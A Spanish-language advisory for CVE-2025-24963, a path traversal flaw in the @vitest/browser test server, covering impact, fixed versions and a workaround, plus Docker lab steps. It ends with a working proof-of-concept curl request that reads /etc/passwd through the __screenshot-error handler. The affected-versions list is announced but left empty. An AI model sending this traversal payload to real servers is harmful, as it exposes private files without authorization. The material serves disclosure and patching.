
CVE-2025-24963 es una vulnerabilidad de severidad media (puntuación CVSS 3.1: 5.9) que afecta al paquete @vitest/browser, un componente del marco de pruebas Vitest impulsado por Vite. Esta vulnerabilidad surge de una validación de entrada inadecuada en el manejador __screenshot-error del servidor HTTP del modo navegador. Cuando el servidor está expuesto a la red mediante la opción de configuración browser.api.host: true, un atacante puede enviar solicitudes especialmente diseñadas para acceder a archivos arbitrarios en el sistema de archivos del servidor, lo que puede dar lugar a la divulgación no autorizada de información sensible.
La vulnerabilidad afecta a las siguientes versiones de @vitest/browser:
Este problema se ha solucionado en las versiones 2.1.9 y 3.0.4. Se recomienda encarecidamente a los usuarios actualizar a estas versiones o posteriores para mitigar la vulnerabilidad.
Si no es posible actualizar de inmediato, una solución alternativa temporal es evitar exponer el servidor del modo navegador a la red, no estableciendo browser.api.host: true en su configuración. Esto impedirá el acceso externo al manejador vulnerable.
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963
Nota: El puerto que utiliza Vitest es dinámico (p. ej., 63315). Es posible que desee supervisar los registros y ajustar el indicador -p en consecuencia.
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"